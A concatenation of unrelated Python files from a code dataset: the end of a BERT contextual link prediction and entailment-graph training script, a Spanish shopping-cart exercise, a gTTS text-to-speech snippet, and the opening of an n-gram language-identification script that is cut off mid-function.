outputs are always tuple in contextual_link_pred (see doc)\n\n if args.n_gpu > 1:\n loss = loss.mean() # mean() to average on multi-gpu parallel training\n if args.gradient_accumulation_steps > 1:\n loss = loss / args.gradient_accumulation_steps\n\n if args.fp16:\n with amp.scale_loss(loss, optimizer) as scaled_loss:\n scaled_loss.backward()\n torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), args.max_grad_norm)\n else:\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\n\n if step % 10 == 0:\n print(\"loss: \", loss)\n\n tr_loss += loss.item()\n if (step + 1) % args.gradient_accumulation_steps == 0:\n\n optimizer.step()\n scheduler.step() # Update learning rate schedule\n model.zero_grad()\n global_step += 1\n\n if args.local_rank in [-1, 0] and args.logging_steps > 0 and global_step % args.logging_steps == 0:\n # Log metrics\n if (\n args.local_rank == -1 and args.evaluate_during_training\n ): # Only evaluate when single GPU otherwise metrics may not average well\n results, iter_eval_dataloader, eval_dataset = evaluate(args, model, iter_eval_dataloader,\n eval_dataset, eval_file, reset=True)\n for key, value in results.items():\n print(\"eval_{}\".format(key), value, global_step)\n\n if args.local_rank in [-1, 0] and args.save_steps > 0 and global_step % args.save_steps == 0:\n # Save model checkpoint\n output_dir = os.path.join(args.output_dir, \"checkpoint-{}\".format(global_step))\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n model_to_save = (\n model.module if hasattr(model, \"module\") else model\n ) # Take care of distributed/parallel training\n model_to_save.save_pretrained(output_dir)\n tokenizer.save_vocabulary(output_dir)\n torch.save(args, os.path.join(output_dir, \"training_args.bin\"))\n logger.info(\"Saving model checkpoint to %s\", output_dir)\n\n if step % 100 == 0:\n print(\"learning rates:\")\n for param_group in optimizer.param_groups:\n print(param_group[\"lr\"])\n\n if args.max_steps > 0 and global_step > args.max_steps:\n epoch_iterator.close()\n break\n if args.max_steps > 0 and global_step > args.max_steps:\n train_iterator.close()\n break\n\n print(\"EPOCH COMPLETED\" + str(epoch))\n\n if 
epoch < args.num_train_epochs:\n            print(\"RESETTING train_dataset and train_dataloader\")\n            train_dataset = get_iterable_dataset(args, train_dataset.entgrAgg, evaluate=False, tokenizer=tokenizer)\n            train_dataloader = DataLoader(train_dataset, batch_size=args.train_batch_size)\n\n    if args.local_rank in [-1, 0]:\n        tb_writer.close()\n\n    return global_step, tr_loss / global_step, best_steps\n\n\ndef get_iterable_dataset(args, entgrAgg, all=False, evaluate=False, test=False, tokenizer=None):\n    if args.local_rank not in [-1, 0]:\n        torch.distributed.barrier()  # Make sure only the first process in distributed training processes the dataset, and the others will use the cache\n\n    # Load data features from cache or dataset file\n    if all:\n        data_mode = \"all\"\n    elif evaluate:\n        data_mode = \"dev\"\n    elif test:\n        data_mode = \"test\"\n    else:\n        data_mode = \"train\"\n    assert not (evaluate and test)\n    input_path = args.input_path\n\n    if args.entscore_mode == \"contextual\":\n        args.batch_size = args.per_gpu_batch_size * max(1, args.n_gpu)\n    else:\n        args.batch_size = args.per_gpu_batch_size\n    dataset = News_Iterable_Dataset(\n        input_path, entgrAgg, data_mode, args.batch_size, args.preferred_num_labels, args.neg_ratio,\n        args.max_seq_length, args.num_examples, args.mask_ents_prob, tokenizer, args.contextual_hyp, args.hard_negs,\n        args.process_idx, args.num_processes, args.updated_len_loader, args.no_argord, args.triple_count_path)\n    return dataset\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n\n    # Required parameters\n    parser.add_argument(\n        \"--input_path\",\n        default=None,\n        type=str,\n        required=True,\n        help=\"The input data path. It should contain the json file containing the parsed triple mentions and their \"\n             \"contexts.\",\n    )\n\n    parser.add_argument(\n        \"--trels_folder\",\n        default=None,\n        type=str,\n        required=True,\n        help=\"The input trels folder: For each type-pair, the predicates for each timestamp#entity_1#entity_2 are \"\n             \"recorded. For each timestamp and entity pair, the predicates in an interval around the timestamp are \"\n             \"considered. In all our experiments, the interval is set to infinity, so the timestamps are basically not \"\n             \"used. Preliminary experiments with smaller intervals didn't show any improvements in entailment graph \"\n             \"learning. It is possible to use the code with smaller intervals if we re-generate the trels folder.\"\n    )\n\n    parser.add_argument(\n        \"--all_triples_path\",\n        default=None,\n        type=str,\n        required=False,\n        help=\"The input triples split folder (train, dev, and test). If supplied, we split the triple mentions based on \"\n             \"those triples. Otherwise, we split the triple mentions randomly.\"\n    )\n\n    parser.add_argument(\n        \"--num_batches_eval\",\n        type=int,\n        default=1,\n        help=\"Deprecated. It should be 1. Previously: number of batches to evaluate. 
If -1, evaluate everything!\",\n    )\n\n    parser.add_argument(\n        \"--model_type\",\n        default=None,\n        type=str,\n        required=True,\n        help=\"Model type selected in the list: \" + \", \".join(MODEL_CLASSES.keys()),\n    )\n    parser.add_argument(\n        \"--model_name_or_path\",\n        default=None,\n        type=str,\n        required=True,\n        help=\"Path to pre-trained model or shortcut name\",\n    )\n\n    parser.add_argument(\n        \"--output_dir\",\n        default=None,\n        type=str,\n        help=\"The output directory where the model predictions and checkpoints will be written.\",\n    )\n\n    # Other parameters\n\n    parser.add_argument(\n        \"--tokenizer_name\",  # Not important\n        default=\"\",\n        type=str,\n        help=\"Pretrained tokenizer name or path if not the same as model_name\",\n    )\n    parser.add_argument(\n        \"--cache_dir\",\n        default=\"\",\n        type=str,\n        help=\"Where do you want to store the pre-trained models downloaded from s3\",\n    )\n\n    parser.add_argument(\n        \"--max_seq_length\",\n        default=40,\n        type=int,\n        help=\"The maximum total input sequence length after tokenization. Sequences longer \"\n             \"than this will be truncated, sequences shorter will be padded.\",\n    )\n\n    parser.add_argument(\n        \"--pred_dims\",\n        default=-1,\n        type=int,\n        help=\"The number of dimensions for the predicate. By default (-1), it will be set to hidden_size\",\n    )\n\n    parser.add_argument(\n        \"--num_examples\",\n        default=8500000,\n        type=int,\n        help=\"The number of examples (triple mentions) in the corpus. Default is for the NewsSpike corpus.\",\n    )\n\n    parser.add_argument(\n        \"--preferred_num_labels\",\n        type=int,\n        default=0,\n        help=\"The number of (extra) hypothesis predicates that we want to compute contextual link prediction scores for.\"\n             \" We always compute the contextual link prediction scores for all the predicates in the current batch. We \"\n             \"either set this to A) 0, that means we don't evaluate any extra predicates and the candidate predicates \"\n             \"will be only the ones in the current batch (used for training and building entailment graphs for \"\n             \"performance reasons); or B) infinity (100000 for the NewsSpike corpus) which means that we want the \"\n             \"candidate predicates to contain all the possible predicates in the corpus (used for evaluation of the \"\n             \"contextual link prediction).\"\n    )\n\n    parser.add_argument(\n        \"--num_fill\",\n        default=100,\n        type=int,\n        help=\"When building the entailment graphs using the CNCE Markov Chain model, if the number of observed \"\n             \"connected predicates for a triple mention is less than num_fill, we augment the Markov Chain by \"\n             \"connecting the mentions to predicted predicates so that the number of total connections becomes num_fill \"\n             \"(the parameter K in the paper). If the number of all predicates with the same types is less than \"\n             \"num_fill, the triple mention will be connected to all existing predicates with the same types.\"\n    )\n\n    parser.add_argument(\n        \"--neg_ratio\",\n        type=float,\n        default=1.0,\n        help=\"Number of negative labels per positive. Can be used in training, but not for eval or building the graphs. \"\n             \"Was not used in the paper experiments as it did not yield improved results.\",\n    )\n\n    parser.add_argument(\n        \"--alpha\",\n        type=float,\n        default=.5,\n        help=\"The combination coefficient for the novel connection (the parameter alpha in the paper). 
Used when \"\n \"building entailment graphs\",\n )\n\n parser.add_argument(\n \"--beta_comb\",\n type=float,\n default=.5,\n help=\"This is the beta parameter in the paper, i.e., the weight to put on entailment graphs (1-beta will be \"\n \"put on the contextual model). Used when doing contextual link prediction based on the combination of the\"\n \"trained model and the entailment graphs.\",\n )\n\n parser.add_argument(\n \"--num_processes\",\n type=int,\n default=1,\n help=\"number of processes for building entailment graphs. Was 1 for the NewsSpike experiments.\",\n )\n\n parser.add_argument(\n \"--process_idx\",\n type=int,\n default=0,\n help=\"process_idx for building entailment graphs. Useful when num_processes is higher than 1.\",\n )\n\n parser.add_argument(\n \"--entgraph_dir\",\n default=\"entgraphs\",\n type=str,\n help=\"The output entgraph_dir, used with do_build_entgraph\",\n )\n\n parser.add_argument(\n \"--embs_init_path\",\n default=None,\n type=str,\n help=\"The pred_embs_init path for either reading or writing. Not used in the current experiments\",\n )\n\n parser.add_argument(\n \"--do_eval_ext\",\n default=None,\n type=str,\n help=\"eval_file extension just for easier distinction between output files.\",\n )\n\n parser.add_argument(\n \"--entscore_mode\",\n default=\"contextual\",\n type=str,\n help=\"Entailment graph score mode: contextual, binary, or count. All the paper experiments were done with the\"\n \"`contextual` mode\",\n )\n\n parser.add_argument(\n \"--device_name\",\n default=None,\n type=str,\n help=\"device_name used in torch.\",\n )\n\n parser.add_argument(\n \"--prebuilt_entgraph_dir\",\n default=None,\n type=str,\n help=\"The pre-built entailment graph directory on only the training portion of the triples. Used when evaluating\"\n \"the entailment graphs (either alone or combined with the contextual model) on the contextual link\"\n \"prediction task\",\n )\n\n parser.add_argument(\n \"--prebuilt_simSuffix\",\n default=\"_sim.txt\",\n type=str,\n help=\"Prebuilt Entailment graph simSuffix, i.e., the suffix at the end of the entailment graph files (e.g.,\"\n \"person#location_sim.txt)\",\n )\n\n parser.add_argument(\n \"--prebuilt_featIdx\",\n default=0,\n type=int,\n help=\"Prebuilt Entailment graph featIdx. 0 means the first feature (similarity score) in the entailment graph \"\n \"files.\",\n )\n\n parser.add_argument(\n \"--triple_count_path\",\n default=None,\n type=str,\n help=\"Where to write triple_count_path. Will be used in evaluating normal link pred models.\",\n )\n\n parser.add_argument(\"--mask_ents_prob\", default=0.0, type=float,\n help=\"Probability of masking entities with types during training. 
Not used in the paper\")\n parser.add_argument(\"--do_train\", action=\"store_true\", help=\"Whether to run training.\")\n parser.add_argument(\"--do_build_entgraphs\", action=\"store_true\", help=\"Whether to run build entailment graphs.\")\n parser.add_argument(\"--use_only_training_data_to_build_entgraphs\",\n action=\"store_true\",\n help=\"Whether the entailment graphs are built using only the training portion of the triple \"\n \"mentions, or the full triple mentions (training, dev, and test sets).\")\n parser.add_argument(\"--do_eval\", action=\"store_true\", help=\"Whether to run eval on the dev set.\")\n parser.add_argument(\"--do_test\", action=\"store_true\", help=\"Whether to run test on the test set\")\n parser.add_argument(\"--combine_entgraph_emb\", action=\"store_true\",\n help=\"Whether to combine ent graphs and emb model\"\n \" for contextual link prediction.\")\n parser.add_argument(\n \"--evaluate_during_training\", action=\"store_true\", help=\"Run evaluation during training at each logging step.\"\n )\n parser.add_argument(\n \"--do_lower_case\", action=\"store_true\", help=\"Set this flag if you are using an uncased model.\"\n )\n parser.add_argument(\"--freeze11\", action=\"store_true\", help=\"Whether to freeze the first 11 layers of BERT\")\n parser.add_argument(\"--freeze12\", action=\"store_true\", help=\"Whether to freeze the first 12 layers of BERT. Used \"\n \"for ablation studies.\")\n parser.add_argument(\"--no_argord\", action=\"store_true\",\n help=\"Whether to not do arg order mapping. Used for ablation\"\n \" studies\")\n parser.add_argument(\"--updated_len_loader\", action=\"store_true\", help=\"Whether to update len function to not divide\"\n \"by bsz\")\n parser.add_argument(\"--write_output\", action=\"store_true\", help=\"Whether to write output of inference for ent graph\"\n \"building or evaluation\")\n\n parser.add_argument(\"--contextual_hyp\", action=\"store_true\", help=\"Contextual hyp or not. Not used in the paper.\")\n\n parser.add_argument(\"--pmi\", action=\"store_true\", help=\"Whether to weight scores by PMI between entpair and pred.\"\n \"Not used in the paper\")\n\n parser.add_argument(\"--hard_negs\", action=\"store_true\",\n help=\"Whether to generate hard negative examples instead of \"\n \"random ones. Not used in the paper\")\n\n parser.add_argument(\"--per_gpu_batch_size\", default=8, type=int, help=\"Batch size per GPU/CPU for training.\")\n parser.add_argument(\n \"--gradient_accumulation_steps\",\n type=int,\n default=1,\n help=\"Number of updates steps to accumulate before performing a backward/update pass.\",\n )\n parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The initial learning rate for Adam.\")\n parser.add_argument(\"--ctx_lr_ratio\",\n default=1.0,\n type=float,\n help=\"The initial learning rate ratio for contextualized embeddings vs other parameters. 
The\"\n \"learning rate for contextualized embeddings is: learning_rate * ctx_lr_ratio\")\n parser.add_argument(\"--weight_decay\", default=0.0, type=float, help=\"Weight decay if we apply some.\")\n parser.add_argument(\"--adam_epsilon\", default=1e-8, type=float, help=\"Epsilon for Adam optimizer.\")\n parser.add_argument(\"--max_grad_norm\", default=1.0, type=float, help=\"Max gradient norm.\")\n parser.add_argument(\n \"--num_train_epochs\", default=3.0, type=float, help=\"Total number of training epochs to perform.\"\n )\n parser.add_argument(\n \"--max_steps\",\n default=-1,\n type=int,\n help=\"If > 0: set total number of training steps to perform. Override num_train_epochs.\",\n )\n parser.add_argument(\"--warmup_steps\", default=0, type=int, help=\"Linear warmup over warmup_steps.\")\n\n parser.add_argument(\"--logging_steps\", type=int, default=500, help=\"Log every X updates steps.\")\n parser.add_argument(\"--save_steps\", type=int, default=5000, help=\"Save checkpoint every X updates steps.\")\n\n parser.add_argument(\"--no_cuda\", action=\"store_true\", help=\"Avoid using CUDA when available\")\n parser.add_argument(\n \"--overwrite_output_dir\", action=\"store_true\", help=\"Overwrite the content of the output directory\"\n )\n parser.add_argument(\"--seed\", type=int, default=42, help=\"random seed for initialization\")\n\n parser.add_argument(\n \"--fp16\",\n action=\"store_true\",\n help=\"Whether to use 16-bit (mixed) precision (through NVIDIA apex) instead of 32-bit\",\n )\n parser.add_argument(\n \"--fp16_opt_level\",\n type=str,\n default=\"O1\",\n help=\"For fp16: Apex AMP optimization level selected in ['O0', 'O1', 'O2', and 'O3'].\"\n \"See details at https://nvidia.github.io/apex/amp.html\",\n )\n parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"For distributed training: local_rank\")\n parser.add_argument(\"--server_ip\", type=str, default=\"\", help=\"For distant debugging.\")\n parser.add_argument(\"--server_port\", type=str, default=\"\", help=\"For distant debugging.\")\n args = parser.parse_args()\n\n if not args.do_train:\n args.output_dir = args.model_name_or_path\n\n if (\n os.path.exists(args.output_dir)\n and os.listdir(args.output_dir)\n and args.do_train\n and not args.overwrite_output_dir\n ):\n raise ValueError(\n \"Output directory ({}) already exists and is not empty. 
Use --overwrite_output_dir to overcome.\".format(\n args.output_dir\n )\n )\n\n if args.pred_dims != -1:\n print(\"args.pred_dims: \" + str(args.pred_dims))\n from modeling_bert_contextual_link_pred import BertForEntGraphsHiddenSize as BertForEntGraphs\n MODEL_CLASSES[\"bert\"] = (BertConfig, BertForEntGraphs, BertTokenizer)\n\n if args.num_processes > 1 and not args.do_build_entgraphs:\n raise ValueError(\"Multi processing only possible when building the graphs.\")\n\n # Setup distant debugging if needed\n if args.server_ip and args.server_port:\n # Distant debugging - see https://code.visualstudio.com/docs/python/debugging#_attach-to-a-local-script\n import ptvsd\n\n print(\"Waiting for debugger attach\")\n ptvsd.enable_attach(address=(args.server_ip, args.server_port), redirect_output=True)\n ptvsd.wait_for_attach()\n\n # Setup CUDA, GPU & distributed training\n if args.local_rank == -1 or args.no_cuda:\n if not args.device_name:\n device = torch.device(\n \"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\")\n else:\n device = torch.device(\n args.device_name if torch.cuda.is_available() and not args.no_cuda else \"cpu\")\n if args.evaluate_during_training:\n print(\"setting n_gpu to 1\")\n args.n_gpu = 1\n else:\n args.n_gpu = 0 if args.no_cuda else torch.cuda.device_count()\n if args.evaluate_during_training:\n args.n_gpu = 1\n else: # Initializes the distributed backend which will take care of sychronizing nodes/GPUs\n torch.cuda.set_device(args.local_rank)\n device = torch.device(\"cuda\", args.local_rank)\n torch.distributed.init_process_group(backend=\"nccl\")\n args.n_gpu = 1\n args.device = device\n\n # Setup logging\n logging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n level=logging.INFO if args.local_rank in [-1, 0] else logging.WARN,\n )\n logger.warning(\n \"Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s\",\n args.local_rank,\n device,\n args.n_gpu,\n bool(args.local_rank != -1),\n args.fp16,\n )\n\n # Set seed\n _set_seed(args)\n\n # Load pretrained model and tokenizer\n if args.local_rank not in [-1, 0]:\n torch.distributed.barrier() # Make sure only the first process in distributed training will download model & vocab\n\n entgrAgg = EntGraphAggregator(args.trels_folder, args.pmi, args.hard_negs, -1, args.all_triples_path, args.num_fill,\n args.alpha, args.write_output)\n\n args.model_type = args.model_type.lower()\n config_class, model_class, tokenizer_class = MODEL_CLASSES[args.model_type]\n\n config = config_class.from_pretrained(\n args.model_name_or_path,\n cache_dir=args.cache_dir if args.cache_dir else None,\n )\n\n config.num_all_labels = int(entgrAgg.num_all_labels)\n config.pred_dims = args.pred_dims\n\n tokenizer = tokenizer_class.from_pretrained(\n args.tokenizer_name if args.tokenizer_name else args.model_name_or_path,\n do_lower_case=args.do_lower_case,\n cache_dir=args.cache_dir if args.cache_dir else None,\n )\n\n # don't load model if building entgraph with binary mode\n loadModel = not ((args.do_build_entgraphs and args.entscore_mode == \"binary\") or (\n (args.do_eval or args.do_test) and args.prebuilt_entgraph_dir and not args.combine_entgraph_emb))\n\n if loadModel:\n\n print(\"loading pretrained model\")\n model = model_class.from_pretrained(\n args.model_name_or_path,\n from_tf=bool(\".ckpt\" in args.model_name_or_path),\n config=config,\n cache_dir=args.cache_dir if args.cache_dir else None,\n )\n print(\"model 
loaded\")\n #\n\n if args.freeze11:\n unfrozen_layers = [\"pooler\", \"cls\", \"pred_embs\", \"encoder.layer.11\"]\n for name, param in model.named_parameters():\n if not any([layer in name for layer in unfrozen_layers]):\n print(\"[FROZE]: %s\" % name)\n param.requires_grad = False\n else:\n print(\"[FREE]: %s\" % name)\n param.requires_grad = True\n\n if args.freeze12:\n unfrozen_layers = [\"pooler\", \"cls\", \"pred_embs\"]\n for name, param in model.named_parameters():\n if not any([layer in name for layer in unfrozen_layers]):\n print(\"[FROZE]: %s\" % name)\n param.requires_grad = False\n else:\n print(\"[FREE]: %s\" % name)\n param.requires_grad = True\n\n else:\n model = None\n\n if args.local_rank == 0:\n torch.distributed.barrier() # Make sure only the first process in distributed training will download model & vocab\n\n if model:\n model.to(args.device)\n\n logger.info(\"Training/evaluation parameters %s\", args)\n best_steps = 0\n\n # Training\n if args.do_train:\n args.num_batches_eval = 1\n train_dataset = get_iterable_dataset(args, entgrAgg, evaluate=False, tokenizer=tokenizer)\n eval_dataset = None\n if args.evaluate_during_training:\n eval_dataset = get_iterable_dataset(args, entgrAgg, evaluate=True, tokenizer=tokenizer)\n\n if args.embs_init_path:\n embs = entgrAgg.get_init_emb_weights(args.embs_init_path)\n model.init_emb_weights(embs)\n global_step, tr_loss, best_steps = train(args, train_dataset, eval_dataset, model, tokenizer)\n logger.info(\" global_step = %s, average loss = %s\", global_step, tr_loss)\n\n # Building entailment graphs\n if args.do_build_entgraphs:\n\n if not args.use_only_training_data_to_build_entgraphs:\n all_dataset = get_iterable_dataset(args, entgrAgg, all=True, tokenizer=tokenizer)\n else:\n all_dataset = get_iterable_dataset(args, entgrAgg, evaluate=False, tokenizer=tokenizer)\n checkpoints = [args.output_dir]\n logger.info(\"Building the entailment graphs with the following checkpoints: %s\", checkpoints)\n\n for checkpoint in checkpoints:\n # global_step = checkpoint.split(\"-\")[-1] if len(checkpoints) > 1 else \"\"\n prefix = checkpoint.split(\"/\")[-1] if checkpoint.find(\"checkpoint\") != -1 else \"\"\n model = None\n if loadModel:\n print(\"loading model for build ent graph\")\n model = model_class.from_pretrained(checkpoint)\n model.to(args.device)\n build_entgraphs(args, all_dataset, model, entgrAgg, prefix)\n\n # Saving best-practices: if you use defaults names for the model, you can reload it using from_pretrained()\n if args.do_train and (args.local_rank == -1 or torch.distributed.get_rank() == 0):\n # Create output directory if needed\n if not os.path.exists(args.output_dir) and args.local_rank in [-1, 0]:\n os.makedirs(args.output_dir)\n\n logger.info(\"Saving model checkpoint to %s\", args.output_dir)\n # Save a trained model, configuration and tokenizer using `save_pretrained()`.\n # They can then be reloaded using `from_pretrained()`\n model_to_save = (\n model.module if hasattr(model, \"module\") else model\n ) # Take care of distributed/parallel training\n model_to_save.save_pretrained(args.output_dir)\n tokenizer.save_pretrained(args.output_dir)\n\n # Good practice: save your training arguments together with the trained model\n torch.save(args, os.path.join(args.output_dir, \"training_args.bin\"))\n\n # Load a trained model and vocabulary that you have fine-tuned\n model = model_class.from_pretrained(args.output_dir)\n tokenizer = tokenizer_class.from_pretrained(args.output_dir)\n model.to(args.device)\n\n # Evaluation\n 
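# The evaluation loop below streams the iterable dataset batch by batch; each\n    # batch's AP and loss are weighted by its actual size (current_ratio), so\n    # the final MAP and mean loss are size-weighted averages over all batches.\n    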
results = {}\n if (args.do_eval or args.do_test) and args.local_rank in [-1, 0]:\n # if not args.do_train:\n # args.output_dir = args.model_name_or_path\n\n args.num_batches_eval = 1\n\n args.eval_batch_size = args.per_gpu_batch_size * max(1, args.n_gpu)\n if args.do_eval:\n eval_dataset = get_iterable_dataset(args, entgrAgg, evaluate=True, tokenizer=tokenizer)\n else:\n eval_dataset = get_iterable_dataset(args, entgrAgg, test=True, tokenizer=tokenizer)\n\n eval_dataloader = DataLoader(eval_dataset, batch_size=args.eval_batch_size)\n\n model = None\n prebuilt_entgr_col = None\n\n global_step = 0\n\n if loadModel:\n\n checkpoints = [args.output_dir]\n logger.info(\"Evaluate the following checkpoints: %s\", checkpoints)\n for checkpoint in checkpoints:\n print(\"loading model for evaluation\")\n model = model_class.from_pretrained(checkpoint)\n model.to(args.device)\n\n if args.prebuilt_entgraph_dir:\n prebuilt_entgr_col = PreBuiltEntGraphCollection(args.prebuilt_entgraph_dir, args.prebuilt_featIdx,\n args.prebuilt_simSuffix, entgrAgg)\n\n if args.combine_entgraph_emb:\n if args.do_eval:\n eval_file = open(\"eval_final_\" + args.model_name_or_path.split(\"/\")[1] + \"_\" +\n args.prebuilt_entgraph_dir.split(\"/\")[-1] + \"_feature_index_\" + str(args.prebuilt_featIdx) + (\n \"_\" + args.do_eval_ext if args.do_eval_ext else \"\") + \".txt\", \"w\")\n else:\n eval_file = open(\"test_final_\" + args.model_name_or_path.split(\"/\")[1] + \"_\" +\n args.prebuilt_entgraph_dir.split(\"/\")[-1] + \"_feature_index_\" + str(args.prebuilt_featIdx) + (\n \"_\" + args.do_eval_ext if args.do_eval_ext else \"\") + \".txt\", \"w\")\n\n elif loadModel:\n if args.do_eval:\n eval_file = open(\"eval_final_\" + args.model_name_or_path.split(\"/\")[1] + (\n \"_\" + args.do_eval_ext if args.do_eval_ext else \"\") + \".txt\", \"w\")\n else:\n eval_file = open(\"test_final_\" + args.model_name_or_path.split(\"/\")[1] + (\n \"_\" + args.do_eval_ext if args.do_eval_ext else \"\") + \".txt\", \"w\")\n else:\n if args.do_eval:\n eval_file = open(\n \"eval_final_\" + args.prebuilt_entgraph_dir.split(\"/\")[-1] + \"_feature_index_\" + str(args.prebuilt_featIdx) + (\n \"_\" + args.do_eval_ext if args.do_eval_ext else \"\") + \".txt\", \"w\")\n else:\n eval_file = open(\n \"test_final_\" + args.prebuilt_entgraph_dir.split(\"/\")[-1] + \"_feature_index_\" + str(args.prebuilt_featIdx) + (\n \"_\" + args.do_eval_ext if args.do_eval_ext else \"\") + \".txt\", \"w\")\n\n iter_eval_dataloader = iter(eval_dataloader)\n\n eval_AP = 0\n eval_loss = 0\n\n types2AP = defaultdict(float)\n types2loss = defaultdict(float)\n types2count = defaultdict(float)\n\n while not eval_dataset.finished:\n results, iter_eval_dataloader, eval_dataset = evaluate(args, model, iter_eval_dataloader, eval_dataset,\n eval_file, prebuilt_entgr_col=prebuilt_entgr_col,\n tokenizer=tokenizer)\n current_batch_size, current_batch_type = eval_dataset.current_batch_size, eval_dataset.current_batch_types\n current_ratio = current_batch_size / eval_dataset.batch_size\n global_step += current_ratio\n types2count[eval_dataset.current_batch_types] += current_ratio\n if results:\n for key, value in results.items():\n print(\"eval_{}\".format(key), value, current_batch_size)\n if \"_AP\" in key:\n eval_AP += value * current_ratio\n types2AP[eval_dataset.current_batch_types] += value * current_ratio\n elif \"_loss\" in key:\n eval_loss += value * current_ratio\n types2loss[eval_dataset.current_batch_types] += value * current_ratio\n\n eval_file.write(\"\\ntypes 
results:\\n\\n\")\n\n types_results = []\n for types in types2count:\n types_results.append((types2AP[types] / types2count[types], types2loss[types] / types2count[types], types,\n types2count[types]))\n\n types_results = sorted(types_results, key=lambda x: -x[3])\n for types_result in types_results:\n for res in types_result:\n eval_file.write(str(res) + \"\\t\")\n eval_file.write(\"\\n\")\n\n eval_file.write(\"\\naccumulated results:\\n\\n\")\n\n eval_MAP = eval_AP / global_step\n eval_file.write(\"MAP: \" + str(eval_MAP) + \"\\n\")\n\n eval_Mloss = eval_loss / global_step\n eval_file.write(\"mean eval_loss: \" + str(eval_Mloss) + \"\\n\")\n\n if best_steps:\n logger.info(\"best steps of eval acc is the following checkpoints: %s\", best_steps)\n return results\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mjhosseini/open_contextual_link_pred","sub_path":"modeling/run_contextual_link_pred.py","file_name":"run_contextual_link_pred.py","file_ext":"py","file_size_in_byte":44878,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"29381852579","text":"p1=[1,\"Pokemon X\",33.77]\np2=[2,\"Nintendo XL\",203]\np3=[3,\"Mario Kart 7\",27.58]\np4=[4,\"PlayStation 4\",348.00]\np5=[5,\"FIFA 16\",51.19]\n\nproductoss = p1, p2, p3, p4, p5\nprecio_de_productos = productoss[2]\n\nc_p1 = 0\nc_p2 = 0\nc_p3 = 0\nc_p4 = 0\nc_p5 = 0\n\nwhile True:\n inicio = input(\"¿Que productos y cuantos quieres comprar?: \")\n if inicio == \"ver\":\n if c_p1 > 0:\n print(\"{}...{}\".format(c_p1, p1[1]))\n if c_p2 > 0:\n print(\"{}...{}\".format(c_p2, p2[1]))\n if c_p3 > 0:\n print(\"{}...{}\".format(c_p3, p3[1]))\n if c_p4 > 0:\n print(\"{}...{}\".format(c_p4, p4[1]))\n if c_p5 > 0:\n print(\"{}...{}\".format(c_p5, p5[1]))\n elif inicio == \"checkout\":\n\n total = c_p1*p1[2] + c_p2*p2[2] + c_p3*p3[2] + c_p4*p4[2] + c_p5 * p5[2]\n\n if c_p1 > 0 and c_p2 > 0 and c_p3 > 0:\n total = total * 0.8\n\n elif c_p4 > 0 and c_p5 > 0:\n total = total * 0.85\n\n print(\"El total es: {}\".format(round(total,1)))\n break\n\n else:\n producto_cantidad = inicio.split(\",\")\n producto = int(producto_cantidad[0])\n cantidad = int(producto_cantidad[1])\n\n if producto == p1[0]:\n c_p1 += cantidad\n elif producto == p2[0]:\n c_p2 += cantidad\n elif producto == p3[0]:\n c_p3 += cantidad\n elif producto == p4[0]:\n c_p4 += cantidad\n elif producto == p5[0]:\n c_p5 += cantidad\n\n\n\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito2_ej4/hito2_ej4_81c6bd40760a666289f821cca514fbaa.py","file_name":"hito2_ej4_81c6bd40760a666289f821cca514fbaa.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37346423288","text":"# \n\nfrom gtts import gTTS\nimport os\n\ndef Text_To_Speech(myText,language):\n output = gTTS(text=myText,lang=language,slow=False)\n\n outputPath = os.getcwd() + \"/Text-To-Speech/output/\" + language + \"-language.mp3\"\n\n output.save(outputPath)\n\n\n# myText = \"Hello !! 
My name is kaushal\"\nmyText = '''\nit's all right\n'''\nlanguage = \"ja\"\n\nText_To_Speech(myText,language)\n","repo_name":"kaushal-project/Projects","sub_path":"Text-To-Speech/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74285164408","text":"import os\nimport sys\nimport math\nimport re\nimport argparse\nimport codecs\nimport string\ntry:\n import cPickle as pickle\nexcept:\n import pickle\nfrom collections import defaultdict\n\nLANGUAGES = {\"as\": \"Assamese\", \"gu\": \"Gujarati\", \"hi\": \"Hindi\",\n \"ka\": \"Kannada\", \"ml\": \"Malayalam\",\n \"mr\": \"Marathi\", \"or\": \"Oriya\", \"pa\": \"Punjabi\", \"ta\": \"Tamil\", \"te\": \"Telugu\"}\n\nMIN_NGRAM_LENGTH = 1\nMAX_NGRAM_LENGTH = 3\nMAX_NUM_OF_NGRAMS = 1000\nPENALTY = 1250\nLANGUAGE_MODELS = '/languagemodels/'\n\n\ndef get_input_ngrams(input):\n \"\"\"[summary]\n\n Args:\n input ([string]): [input text by user]\n\n Returns:\n [list of tupeles]: [Each tuple contains ngram and its frequency]\n \"\"\"\n ngram_counts = {}\n input = cleanup_data(input)\n for length in range(MIN_NGRAM_LENGTH, MAX_NGRAM_LENGTH + 1):\n for i in range(len(input) - length):\n ngram = input[i:i + length]\n if ngram in ngram_counts:\n ngram_counts[ngram] += 1\n else:\n ngram_counts[ngram] = 1\n ngram_tuples = (sorted(ngram_counts.items(),\n key=lambda item: item[1], reverse=True))\n return ngram_tuples\n\n\ndef get_ngram_ranks(ngram_tuples):\n \"\"\"[summary]\n\n Args:\n ngram_tuples ([list of tuples]): [Each tuple in the list contains an ngram and its frequency]\n\n Returns:\n [dictionary]: [key is ngram and value is its rank when sorted in decreasing order]\n \"\"\"\n ngram_ranks = {}\n ranks_limit = MAX_NUM_OF_NGRAMS\n if len(ngram_tuples) >= MAX_NUM_OF_NGRAMS:\n ranks_limit = MAX_NUM_OF_NGRAMS\n else:\n ranks_limit = len(ngram_tuples)\n for i in range(ranks_limit):\n ngram = ngram_tuples[i][0]\n ngram_ranks[ngram] = i\n return ngram_ranks\n\n\ndef 